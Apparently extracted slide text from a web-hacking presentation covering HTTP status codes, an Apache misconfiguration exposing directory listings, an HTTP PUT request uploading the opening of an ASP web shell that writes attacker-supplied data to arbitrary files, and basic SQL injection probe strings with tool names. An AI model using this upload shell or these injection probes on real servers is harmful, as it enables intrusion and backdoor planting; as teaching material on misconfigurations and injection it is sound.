21. HTTP结构 (HTTP Response)Status Code常见: 200 , OK 201 , Create 301 , Moved Permanently 302 , Found (temporarily) 400 , Bad Request 401 , Unauthorized 404 , Not Found 500 , Internal Server Error
36. Hacking配置错误 —— indexes<IfModulemod_dir.c>DirectoryIndex index.html index.cgi index.pl index.php index.xhtml index.htm</IfModule>………..………..<Directory /var/www/> Options IndexesFollowSymLinksAllowOverride None Order allow,deny allow from all</Directory>
37. Hacking配置错误 —— HTTP PUTPUT /test.txt HTTP/1.1Host: www.site.comContent-Length: 1220<% dim objFSO %><% dim fdata %><% dim objCountFile %><% on error resume next %><% Set objFSO = Server.CreateObject("Scripting.FileSystemObject") %><% if Trim(request("syfdpath"))<>"" then %><% fdata = request("cyfddata") %><% Set objCountFile=objFSO.CreateTextFile(request("syfdpath"),True) %>…………………………………………
42. Hacking注入漏洞 —— SQL注入Select * from table_name where id=1Select * from table_name where id=1’Select * from table_name where id=1and 1=1Select * from table_name where id=1 and 1=2Select * from table_name where id=1 and (select ……)Injection Tools: 1、SQL Helper 2、SQLMAP (v0.9)